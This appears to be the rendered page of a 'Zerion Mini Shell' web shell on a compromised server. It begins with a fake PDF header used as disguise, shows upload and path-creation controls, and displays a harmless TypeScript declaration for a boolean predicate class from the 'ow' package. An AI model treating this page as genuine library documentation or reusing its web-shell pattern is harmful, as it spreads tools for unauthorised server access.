%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/specpages-backup/node_modules/ow/dist/source/predicates/
Upload File :
Create Path :
Current File : /www/specpages-backup/node_modules/ow/dist/source/predicates/boolean.d.ts

import { Predicate, PredicateOptions } from './predicate';
export declare class BooleanPredicate extends Predicate<boolean> {
    /**
    @hidden
    */
    constructor(options?: PredicateOptions);
    /**
    Test a boolean to be true.
    */
    get true(): this;
    /**
    Test a boolean to be false.
    */
    get false(): this;
}

Zerion Mini Shell 1.0